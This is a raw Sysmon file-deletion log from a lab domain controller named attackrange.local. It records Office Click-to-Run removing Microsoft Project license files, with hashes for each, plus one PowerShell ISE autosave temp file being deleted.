Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdO365R_Subscription-pl.xrm-msMD5=DCE614274A45549C4BA7B6CC6831ADFC,SHA256=B1DBE520FA6D3B34E2100A6FC68727E35C11B8864B0E24B12DE96D11E6241D3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdCO365R_SubTrial-ul-oob.xrm-msMD5=9F98E12FBBFDCBD361D2C73E3AFADB49,SHA256=F9B13B7ED92464CF3AD7D725354932538DA514EA440FE71367E865E8EC4B9CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdCO365R_SubTrial-ppd.xrm-msMD5=C5C95500BE9745F8D5A66F4C22E91321,SHA256=20547C6EA70B8293D705A3659639ED0E021646F59B557D63AA106DFD6165330C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdCO365R_SubTrial-pl.xrm-msMD5=63F2792CDEFCA29789B7D2A93EBFB717,SHA256=2CDF042954A42689C3C10597D834B5E5BF34E742FEE3AC69B63241BDDAB2D8E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdCO365R_SubTest-ul-oob.xrm-msMD5=46F419B6E04770C5C105595611F81A12,SHA256=B278F94FEA683CD877DC86A33AE6A5F2AE5D3220BC082089C1423E115EB61A6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdCO365R_SubTest-ppd.xrm-msMD5=6D690B4BF15EC29F1F9FABA7031429CB,SHA256=AF854803E8AD2F2C6120D885CD015D771071D0E8ED5661147697942B20C3AC11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdCO365R_SubTest-pl.xrm-msMD5=BC379D52EFD1526D8001DE4FA61F56E2,SHA256=57D6D2919C9E0C66B6E59B563A6D552BECF1C7C53898EF41CC8FA6B5D0A150B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdCO365R_Subscription-ul-oob.xrm-msMD5=C273180F4DD1D9ACF2D657745529E3CD,SHA256=F6843B4F09C5F1510BA9174DAC9AFDEBE0257A79B3BE6D3489F8CF4CCB827495,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdCO365R_Subscription-ppd.xrm-msMD5=80B803E7C44772D65713F168343298AC,SHA256=252F14A52D1F5D0479BF1B0F0C8C86425B259B9FE04B8699C3524EAE8A79EB5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStdCO365R_Subscription-pl.xrm-msMD5=ACA422D5DED6DA9B1ED5A7A7322DA9FE,SHA256=0605016C2EF6E5128CE32571EBBFE64D467AE23717927AEF0AEE218FB8119D30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019VL_MAK_AE-ul-phn.xrm-msMD5=48AA2266DF4D2891CC4C28588BAE95A9,SHA256=0F63D240A72D1F618B5696E8C77AF45D7554C67E29AB1267171152A391B51233,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019VL_MAK_AE-ul-oob.xrm-msMD5=DFB47E627F69443B7211EF84067E863B,SHA256=E440F0E77A556ECAD5349172F388EA459FF684B6B091D982EAE777481560E477,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019VL_MAK_AE-ppd.xrm-msMD5=DD90339635D3653D605B49338E1187E5,SHA256=BD58AA4E710FFC219C9B993DFC8FE5ACFA5CDD558B6194A64FD39997F0A8E8E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019VL_MAK_AE-pl.xrm-msMD5=27FD753F31F788B73C0C474789807281,SHA256=C0391FDD00429DAE4EBC6A128C0191910085CD60B5BE473A8D971AFC4D194675,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ul.xrm-msMD5=CB7248C68A5F2A1BC7C7806FEBADFD61,SHA256=519CA84DCBA139A65D852CCBD8386560E175DA4B80FD0F1F9E7DAF7A275BBE03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ul-oob.xrm-msMD5=21BA549111E99C4B272D0916747D7F28,SHA256=C285BD69AEC5F57CAE7F7CF76C05961170D6BB3D2BEE4A1CB377D3CEA8E58207,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ppd.xrm-msMD5=330818835896EC41E45DF610788A0890,SHA256=F324A6B635E6823B53BF72CDFEBC0F89EE1E354201C3811DAA84FAA1D2143CCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019R_Retail-ul-phn.xrm-msMD5=D88C4A0E6A297067D4A1A2D70B9D9D4F,SHA256=C3130032E303D78F2C41A28429C5181517DE83BD4ED83735DF879723C2C22B48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019R_Retail-ul-oob.xrm-msMD5=29E458133C5743849C8EBFC7143EEA8F,SHA256=C5F40A7F8A81FC84152016512F6C31C10F4F8BC9CF4329ADF80A4726A4B5A330,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.486{A7A01FEF-DF97-607E-4709-00000000BB01}6584ATTACKRANGE\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6584.xml~RFcfd448.TMPMD5=CDC37ABBACDC5A35D39581DFA1E69C56,SHA256=FD0C987C4EA499B0EF3F04D736EF983ED8B5570A1B8575164A63E0D9F0953E2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019R_Retail-ppd.xrm-msMD5=BB77406F729C01C0D73C5FFF5453BACC,SHA256=8678D10A1D8EB4939471F0CD1C81F26DF3459D51E04D9C73AD0BC321C8F016ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019R_Retail-pl.xrm-msMD5=FA4577A692916CFC8D75134CAB4B1E6B,SHA256=74F110B340A4C6834EC648D66BE4E89DE1628EDE734877DD98ABADC1F0FCE0CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019R_OEM_Perp-ul-phn.xrm-msMD5=B27F23F7532422E1AD47D8DB50080CA6,SHA256=687AD459ECD6B55492EEAB2E763B7A1B220E431F6317E4C2975AFF2E04203B4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019R_OEM_Perp-ul-oob.xrm-msMD5=C4524090F8B2F29C603D9CB48C350C44,SHA256=1EABD6F1EFF8BF03394EF13F2FDF70B70E4E4B6382A0860D0364E08C8C35B938,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019R_OEM_Perp-ppd.xrm-msMD5=68E2EA6F6DD9929F9215263CE102D82D,SHA256=E2B7645BAD2CC20DBB230A2B010E05BFCD78276632D64171C2E07928650DFE5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019R_OEM_Perp-pl.xrm-msMD5=D20E6E2FAA520763F8FAC4411C69A1AA,SHA256=183364CA840EDF0EB1429BE5E726120C17B9FFDD373B32B8190BA68B01B9631F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019R_Grace-ul-oob.xrm-msMD5=3376BF9BA5D3F9987C0FDD358461AC88,SHA256=4275C26794E24FB4B14AD3502B5345AAF85C36AF7A70A46B828287E210490FCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectStd2019R_Grace-ppd.xrm-msMD5=60D7A36B0B374A8FE254E0D19D087F48,SHA256=2EC403468A3630CBF3074827A7256825F968FA1BABDE9417793607501A74E1BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-phn.xrm-msMD5=E5AD465AFA29DB6F96FBAC51775C0B4C,SHA256=195201E3353DE7577C9C9FD97AA18A2AE114868A2E16EC96CFBAEA7DCFBA6E4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-oob.xrm-msMD5=1289575B3F3BA0933D95209CA6372208,SHA256=D7DEE6296DA8306B00070BBFA4F5216EF2431D30A5FAA627766462643D1E2C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProXC2RVL_MAKC2R-ppd.xrm-msMD5=CAF9670EE78CCC054F3F372BFA60A8E8,SHA256=E48ABB01A07BB1DB12FDBF5BF27D9C540142BD574795E28A0E726ECF58D7A067,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProXC2RVL_MAKC2R-pl.xrm-msMD5=0C2BB4DFEEBA339D865A22BC52636E06,SHA256=B3AC8B091A308898F7B8305B801BCBF979D0E1B53B787D88B768F47B373431F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProXC2RVL_KMS_ClientC2R-ul.xrm-msMD5=DEC1AE3B3E6B54E4692B9F405B6D4B2A,SHA256=2042128A5EEC042210132D38FF4EF0BD68361EEE531C90AC16431E007ADADD11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProXC2RVL_KMS_ClientC2R-ul-oob.xrm-msMD5=9506060238C58A2A5B9F3C8D1CC0B99D,SHA256=49F488B3C0B7211C653EE08E2FE8D39FFCB99B897338414B1C9DFA5206D4A82B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProXC2RVL_KMS_ClientC2R-ppd.xrm-msMD5=F35F561D3307B386D6B8085A770D9705,SHA256=776F4557CD00A8C283AC58B2E41C5CBCDFE18F70FD8853D9481C735FBB080FFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProVL_MAK-ul-phn.xrm-msMD5=1FE061FFEBDDE770D6530BB5A9512F58,SHA256=0A756E73AF86413B29B492BEA1D25BBCD859DCF772003D99E4A77F14EFD9FCD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProVL_MAK-ul-oob.xrm-msMD5=C3EE458AF46E09129C93ABB05B983ABF,SHA256=7461687707055FEE190AD537545829F9014C91B8CBD59819938E9A547742EF24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProVL_MAK-ppd.xrm-msMD5=4AE4785333DA2E9C8995E39EEFC07CD2,SHA256=9820562C47022A098335402D019396B9AB8A5270311961D2B29DD3104F6C49AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProVL_MAK-pl.xrm-msMD5=67ACFA64F10E3833607BCDBA81DF91D4,SHA256=985CB06B605BD25393D27B5B684A3B0E9E0D4E3DCD96EA78AAC1CF342C1B4F20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProVL_KMS_Client-ul.xrm-msMD5=473A12D76AEA3D8789A52C5EBCBC4494,SHA256=9BEFC91D997F5FBDFC7CED8AF2E1983B313410A4C3FCE6BD67CC682EBA355C55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProVL_KMS_Client-ul-oob.xrm-msMD5=2D93F5081321BA3ADB1BB556334665F6,SHA256=7CF523C149C563EE81AED96D22CDA1BD7852AE1CD38D7E85C49CE1466FF04374,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProVL_KMS_Client-ppd.xrm-msMD5=931709625B4C3285F119AA7EF85C51A5,SHA256=72CA892652775603D65C8ED7BA5790FA2B2EC28E8CC00E02AAE4A12E8EE3626B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_Trial-ul-oob.xrm-msMD5=2FF7395D85B4AC5D11D4FA55BE1AD531,SHA256=BD61F3CDDC9A1B19FF05F380AFD48A98BC7A3AFCBB60ED857E6E85445589806F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProjectProR_Trial-ppd.xrm-msMD5=5DA7640E126690FD5733EBB0E4669E43,SHA256=D3128988F64E8BEC2818D201833F1E2D6F17102DF3C96E16B15852C2509CACA6,IMPHASH=00000000000000000000000000000000falsetrue 